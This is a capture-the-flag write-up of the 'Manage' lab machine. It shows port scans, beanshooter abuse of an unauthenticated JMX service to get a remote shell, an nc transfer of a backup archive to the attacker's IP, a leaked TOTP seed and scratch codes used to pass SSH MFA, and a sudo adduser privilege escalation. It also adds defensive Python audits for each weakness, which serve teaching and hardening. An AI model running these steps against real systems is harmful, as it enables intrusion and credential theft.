Manage
Recon
```
└─$ rustscan -a 10.10.82.208 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.  .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___}/  {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog          :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.82.208:22
Open 10.10.82.208:2222
Open 10.10.82.208:8080
Open 10.10.82.208:42073
Open 10.10.82.208:39741
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:15 +05
Initiating Ping Scan at 21:15
Scanning 10.10.82.208 [4 ports]
Completed Ping Scan at 21:15, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:15
Scanning 10.10.82.208 [5 ports]
Discovered open port 8080/tcp on 10.10.82.208
Discovered open port 22/tcp on 10.10.82.208
Discovered open port 42073/tcp on 10.10.82.208
Discovered open port 39741/tcp on 10.10.82.208
Discovered open port 2222/tcp on 10.10.82.208
Completed SYN Stealth Scan at 21:15, 0.11s elapsed (5 total ports)
Nmap scan report for 10.10.82.208
Host is up, received reset ttl 63 (0.090s latency).
Scanned at 2024-12-14 21:15:30 +05 for 0s

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack ttl 63
2222/tcp  open  EtherNetIP-1 syn-ack ttl 63
8080/tcp  open  http-proxy   syn-ack ttl 63
39741/tcp open  unknown      syn-ack ttl 63
42073/tcp open  unknown      syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (260B)
```
```
└─$ nmap -sC -sV -p22,2222,8080,39741,42073 10.10.82.208
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:16 +05
Nmap scan report for 10.10.82.208
Host is up (0.096s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a9:36:3d:1d:43:62:bd:b3:88:5e:37:b1:fa:bb:87:64 (ECDSA)
|_  256 da:3b:11:08:81:43:2f:4c:25:42:ae:9b:7f:8c:57:98 (ED25519)
2222/tcp  open  java-rmi Java RMI
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:42073
|     extends
|       java.rmi.server.RemoteStub
|       extends
|         java.rmi.server.RemoteObject
8080/tcp  open  http     Apache Tomcat 10.1.19
|_http-title: Apache Tomcat/10.1.19
|_http-favicon: Apache Tomcat
39741/tcp open  tcpwrapped
42073/tcp open  java-rmi Java RMI
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds
```
We find Apache Tomcat 10.1.19 running on port 8080, but there is nothing of interest there.
User
The most interesting port is 2222, which nmap identifies as a Java RMI registry. Its only bound name is jmxrmi, a javax.management.remote.rmi.RMIServerImpl_Stub pointing at 127.0.1.1:42073, so this is the JVM's remote management interface (JMX over RMI), and the second java-rmi port, 42073, is the RMI server that stub refers to. Material to read to understand RMI and JMX:
To enumerate the service we will use beanshooter:
```
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar -h
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
usage: beanshooter [-h] ...

beanshooter v4.1.0 - a JMX enumeration and attacking tool

positional arguments:

    attr          set or get MBean attributes
    brute         bruteforce JMX credentials
    deploy        deploys the specified MBean on the JMX server
    enum          enumerate the JMX service for common vulnerabilities
<SNIP>
```
Let’s enumerate the JMX service:
```
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum 10.10.82.208 2222
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Checking available bound names:
[+]
[+]     * jmxrmi (JMX endpoint: 127.0.1.1:42073)
[+]
[+] Checking for unauthorized access:
[+]
[+]     - Remote MBean server does not require authentication.
[+]       Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - Remote MBeanServer rejected the payload class.
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+]     - 171 MBeans are currently registred on the MBean server.
[+]       Listing 149 non default MBeans:
<SNIP>
[+]
[+] Enumerating tomcat users:
[+]
[+]     - Listing 2 tomcat users:
[+]
[+]       ----------------------------------------
[+]       Username: manager
[+]       Password: <REDACTED>
[+]       Roles:
[+]         Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+]       ----------------------------------------
[+]       Username: admin
[+]       Password: <REDACTED>
[+]       Roles:
[+]         Users:type=Role,rolename="role1",database=UserDatabase
```
The Tomcat UserDatabase MBean handed us the admin and manager credentials in clear text. Because the MBean server requires no authentication, the same tool can also give us a shell: the standard action deploys a StandardMBean carrying a TemplateImpl payload, and the tonka action then opens an interactive shell.
```
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard 10.10.82.208 2222 tonka
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+]     Deplyoing MBean: StandardMBean
[+]     MBean with object name de.qtc.beanshooter:standard=22016402736778 was successfully deployed.
[+]
[+]     Caught NullPointerException while invoking the newTransformer action.
[+]     This is expected bahavior and the attack most likely worked :)
[+]
[+]     Removing MBean with ObjectName de.qtc.beanshooter:standard=22016402736778 from the MBeanServer.
[+]     MBean was successfully removed.
```
```
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.10.82.208 2222
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[tomcat@10.10.82.208 /]$ whoami
tomcat
[tomcat@10.10.82.208 /]$
```
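Everything from the enumeration to the shell followed from one launch setting: the remote JMX connector on port 2222 accepted connections without authentication (beanshooter's "Remote MBean server does not require authentication"). The block below is an added example, not part of the writeup and not beanshooter's code: a small Python audit that parses a JVM's -D options and reports the JMX settings that produce exactly the picture seen in the scan, next to a hardened set. Both option strings are constructed for this example; the box's real launch options are not shown on the page, and the file paths under /etc/tomcat are assumptions.

```python
import shlex

# Prefix of the JDK's built-in remote JMX agent properties.
JMX = "com.sun.management.jmxremote"

# Constructed launch options (the writeup does not show the box's real ones).
# WEAK reproduces what the scan observed: registry on 2222, no authentication,
# RMI server on an unpinned port, stub advertising the resolved host name.
WEAK_OPTS = (
    f"-D{JMX} -D{JMX}.port=2222 "
    f"-D{JMX}.authenticate=false -D{JMX}.ssl=false"
)

# HARDENED keeps remote management but makes it authenticated, encrypted and
# firewall-friendly.  The file paths are assumptions for this example.
HARDENED_OPTS = (
    f"-D{JMX} -D{JMX}.port=2222 -D{JMX}.rmi.port=2222 "
    f"-Djava.rmi.server.hostname=10.10.82.208 "
    f"-D{JMX}.authenticate=true "
    f"-D{JMX}.password.file=/etc/tomcat/jmxremote.password "
    f"-D{JMX}.access.file=/etc/tomcat/jmxremote.access "
    f"-D{JMX}.ssl=true"
)


def parse_opts(opts: str) -> dict:
    """Map every -Dkey[=value] token to its value; a bare -Dkey means 'true'."""
    props = {}
    for tok in shlex.split(opts):
        if tok.startswith("-D"):
            key, sep, val = tok[2:].partition("=")
            props[key] = val if sep else "true"
    return props


def audit_jmx_opts(opts: str) -> list:
    """Return a list of findings for the JMX-related options in `opts`."""
    props = parse_opts(opts)
    findings = []
    port = props.get(f"{JMX}.port")
    if port is None:
        return findings  # no remote connector configured: nothing exposed on the network
    if props.get(f"{JMX}.authenticate", "true").lower() == "false":
        findings.append(f"authentication disabled: anyone reaching port {port} "
                        "can read attributes and deploy MBeans")
    else:
        for suffix in (".password.file", ".access.file"):
            if f"{JMX}{suffix}" not in props:
                findings.append(f"{JMX}{suffix} not set: JDK default location assumed")
    if props.get(f"{JMX}.ssl", "true").lower() == "false":
        findings.append("TLS disabled: credentials and serialized objects travel in clear text")
    if f"{JMX}.rmi.port" not in props:
        findings.append("rmi.port not pinned: RMI server binds a random high port (42073 in the scan)")
    if "java.rmi.server.hostname" not in props:
        findings.append("java.rmi.server.hostname unset: stub advertises the resolved host name "
                        "(127.0.1.1 in the scan)")
    return findings


if __name__ == "__main__":
    for label, opts in (("weak", WEAK_OPTS), ("hardened", HARDENED_OPTS)):
        print(f"[{label}]")
        for finding in audit_jmx_opts(opts) or ["no findings"]:
            print("  -", finding)
```

The hardened string relies only on the JDK's documented agent properties: authenticate=true with a password and access file, ssl=true, rmi.port pinned to the registry port so one firewall rule covers both, and java.rmi.server.hostname set so the stub stops advertising 127.0.1.1 (the name an Ubuntu host resolves itself to through /etc/hosts). Even with authentication, the credentials the UserDatabase MBean returns are only as safe as the JMX channel, so a management port like this should not be reachable from untrusted networks at all.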
Now we need to move laterally. There are two users with home directories, useradmin and karl. We tried the passwords recovered from the JMX enumeration against karl without success, but trying the admin password on useradmin produced a Verification code prompt:
```
tomcat@manage:/$ su useradmin
su useradmin
Password: <SNIP>
Verification code:
```
In useradmin's home we find a .google_authenticator file (mode 0400, so tomcat cannot read it) and a backups folder:
```
tomcat@manage:/home/useradmin$ ls -lha
ls -lha
total 36K
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 .
drwxr-xr-x 4 root      root      4.0K Jun 21 15:46 ..
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 backups
lrwxrwxrwx 1 useradmin useradmin    9 Jun 21 15:48 .bash_history -> /dev/null
-rw-r--r-- 1 useradmin useradmin  220 Jun 21 15:46 .bash_logout
-rw-r--r-- 1 useradmin useradmin 3.7K Jun 21 15:46 .bashrc
drwx------ 2 useradmin useradmin 4.0K Jun 21 16:48 .cache
-r-------- 1 useradmin useradmin  200 Dec 14 17:06 .google_authenticator
-rw-r--r-- 1 useradmin useradmin  807 Jun 21 15:46 .profile
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 15:53 .ssh
```
Inside backups we find a world-readable archive, backup.tar.gz; we transfer it to our machine with nc:
```
tomcat@manage:/home/useradmin/backups$ ls -lha
ls -lha
total 12K
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 .
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 ..
-rw-rw-r-- 1 useradmin useradmin 3.1K Jun 21 16:50 backup.tar.gz
tomcat@manage:/home/useradmin/backups$ nc 10.8.4.147 6666 < backup.tar.gz
nc 10.8.4.147 6666 < backup.tar.gz
```
Inside the archive we find a copy of .google_authenticator and a .ssh directory containing SSH keys:
```
└─$ cat .google_authenticator
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775
```
```
└─$ ls -lha .ssh
total 20K
drwxrwxr-x 2 kali kali 4.0K Jun 21 20:53 .
drwxr-xr-x 5 kali kali 4.0K Jun 21 21:48 ..
-rw------- 1 kali kali   98 Jun 21 20:56 authorized_keys
-rw------- 1 kali kali  411 Jun 21 20:53 id_ed25519
-rw-r--r-- 1 kali kali   98 Jun 21 20:53 id_ed25519.pub
```
When we connect with the key over SSH, the server still prompts for a verification code, so entering one of the codes from the .google_authenticator file gives us access:
```
└─$ ssh -i .ssh/id_ed25519 useradmin@10.10.82.208
The authenticity of host '10.10.82.208 (10.10.82.208)' can't be established.
ED25519 key fingerprint is SHA256:mTJofQVp4T/1uO1CFsfPt8SADZfjbzIIynR0Zeqi0qo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.82.208' (ED25519) to the list of known hosts.
(useradmin@10.10.82.208) Verification code:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Sat Dec 14 05:15:31 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   74.8% of 6.06GB   Users logged in:       0
  Memory usage: 41%               IPv4 address for ens5: 10.10.82.208
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Jun 21 16:48:53 2024 from 192.168.94.139
useradmin@manage:~$
```
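To show what the recovered file hands over, and therefore what a defender has to protect, here is an added Python example (not from the writeup, and not the PAM module's code): a parser for the libpam-google-authenticator state file in the layout shown above, RFC 6238 TOTP computed from the seed on its first line, and a verify function that mirrors the module's acceptance rule for scratch codes and the WINDOW_SIZE option. The sample file is constructed with the RFC 6238 test seed and made-up scratch codes, not the values from the box.

```python
import base64
import hashlib
import hmac
import struct
import time

# Constructed sample in the layout of the .google_authenticator file above:
# line 1 is the base32 TOTP seed, lines beginning with '" ' are options, and
# every remaining numeric line is an emergency scratch code.  The seed here is
# the RFC 6238 test key "12345678901234567890" in base32, not the one from the
# box, and the scratch codes are made up.
SAMPLE_FILE = """\
GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
31415926
27182818
"""


def parse_ga_file(text):
    """Split a google-authenticator state file into seed, options and scratch codes."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    cfg = {"secret": lines[0], "options": {}, "scratch": []}
    for ln in lines[1:]:
        if ln.startswith('"'):
            name, *args = ln[1:].split()
            cfg["options"][name] = args
        elif ln.isdigit():
            cfg["scratch"].append(ln)
    return cfg


def hotp(secret_b32, counter, digits=6):
    """RFC 4226 HOTP with HMAC-SHA1, the algorithm libpam-google-authenticator uses."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return f"{code:0{digits}d}"


def totp(secret_b32, at=None, step=30):
    """RFC 6238 TOTP: HOTP over the 30-second time counter."""
    now = time.time() if at is None else at
    return hotp(secret_b32, int(now // step))


def verify(cfg, code, at=None):
    """Mirror the PAM module's rule: a scratch code is accepted once and consumed;
    otherwise the code must equal a TOTP inside WINDOW_SIZE consecutive steps."""
    if code in cfg["scratch"]:
        cfg["scratch"].remove(code)
        return "scratch"
    window = int(cfg["options"].get("WINDOW_SIZE", ["3"])[0])
    centre = int((time.time() if at is None else at) // 30)
    for counter in range(centre - window // 2, centre + window // 2 + 1):
        if hmac.compare_digest(hotp(cfg["secret"], counter), code):
            return "totp"
    return None


if __name__ == "__main__":
    cfg = parse_ga_file(SAMPLE_FILE)
    print("scratch codes remaining:", len(cfg["scratch"]))
    print("current code from the seed:", totp(cfg["secret"]))
```

Two things follow from running it. The scratch codes are single-use and consumed on success, but they sit in the file in clear text, so a copy of the file is a bundle of valid second factors; and the seed on line 1 reproduces every future code, so the factor is only as secret as that file. Backing .google_authenticator up into a world-readable archive, as on this box, defeats the MFA outright: the file belongs at mode 0400, should be excluded from backups or encrypted in them, and a leaked seed has to be replaced by re-enrolling the user.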
Root
useradmin can run adduser as root through sudo without a password, but the argument must match the regex ^[a-zA-Z0-9]+$, a single alphanumeric username, so options such as --system or --ingroup are rejected:
```
useradmin@manage:~$ sudo -l
Matching Defaults entries for useradmin on manage:
    env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User useradmin may run the following commands on manage:
    (ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$
```
Following the hint for root, we look at the default Ubuntu sudoers file:
```
<SNIP>
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
<SNIP>
```
There is no admin user or group yet, and adduser creates a user-private group named after the new user, so adding a user called admin puts it into a freshly created admin group that satisfies the rule above. From there, sudo su gives us root and the box is pwned:
```
useradmin@manage:~$ sudo /usr/sbin/adduser admin
Adding user `admin' ...
Adding new group `admin' (1003) ...
Adding new user `admin' (1003) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
useradmin@manage:~$ su admin
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@manage:/home/useradmin$ sudo su
[sudo] password for admin:
root@manage:/home/useradmin#
```
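The chain above rests on two settings that each look harmless on their own: the %admin ALL=(ALL) ALL rule Ubuntu still ships for a group that no longer exists by default, and a sudo rule that lets useradmin run adduser with any alphanumeric name. The block below is an added Python audit, not part of the writeup: it parses sudoers-style rules and an /etc/group-style file and flags every group rule whose group does not exist yet but could be created through a permitted adduser call, applying the same regex matching that sudo 1.9.10 and later use for ^...$ arguments. The two sample files are constructed from the sudo -l output and the sudoers excerpt above, not copies of the box's real files.

```python
import re
from dataclasses import dataclass

# Constructed samples modelled on the sudo -l output and the default Ubuntu
# /etc/sudoers excerpt shown above; not copies of the box's real files.
SAMPLE_SUDOERS = """\
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
useradmin ALL=(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$
"""

SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
useradmin:x:1001:
karl:x:1002:
"""

# user/group  host = (runas)  TAG:  command [argument spec]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?P<runas>\([^)]*\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


@dataclass
class Rule:
    who: str        # user name, or %group
    nopasswd: bool
    cmd: str        # command plus argument spec; 'ALL' means any command


def parse_sudoers(text):
    """Parse user specifications; Defaults lines and comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append(Rule(m["who"], "NOPASSWD" in m["tags"], m["cmd"].strip()))
    return rules


def parse_groups(text):
    """Group names from /etc/group-style text."""
    return {ln.split(":")[0] for ln in text.splitlines() if ln and not ln.startswith("#")}


def username_allowed(rule, name):
    """Would sudo accept `name` as the sole argument of this rule's command?"""
    parts = rule.cmd.split(maxsplit=1)
    if rule.cmd == "ALL" or len(parts) == 1:
        return True                                   # no argument restriction at all
    spec = parts[1]
    if spec.startswith("^") and spec.endswith("$"):   # sudo 1.9.10+ regex argument
        return re.fullmatch(spec[1:-1], name) is not None
    return spec == name                               # literal argument


def find_creatable_group_rules(sudoers_text, group_text, user):
    """Group-based sudo rules whose group is absent but creatable by `user` via adduser.

    adduser on Ubuntu makes a user-private group with the new user's name, so a
    permitted `adduser <name>` yields a member of group <name> as a side effect."""
    rules = parse_sudoers(sudoers_text)
    groups = parse_groups(group_text)
    adduser_rules = [r for r in rules if r.who == user and r.cmd != "ALL"
                     and r.cmd.split()[0].endswith("/adduser")]
    findings = []
    for gr in rules:
        if not gr.who.startswith("%") or gr.who[1:] in groups:
            continue
        for ar in adduser_rules:
            if username_allowed(ar, gr.who[1:]):
                findings.append((gr.who[1:], gr.cmd, ar.cmd))
    return findings


if __name__ == "__main__":
    for group, granted, via in find_creatable_group_rules(SAMPLE_SUDOERS, SAMPLE_GROUP, "useradmin"):
        print(f"group '{group}' does not exist but '{via}' can create it; the group rule grants: {granted}")
```

Two fixes follow from the finding: drop the unused %admin rule (or create the group and control its membership), and constrain the adduser rule to a pattern that cannot spell an existing or sudoers-referenced group name, for instance a service-account prefix as in the tightened variant the test exercises. The regex does stop option injection such as --system or --ingroup, which is what the author ran into, but it says nothing about which names are safe to create.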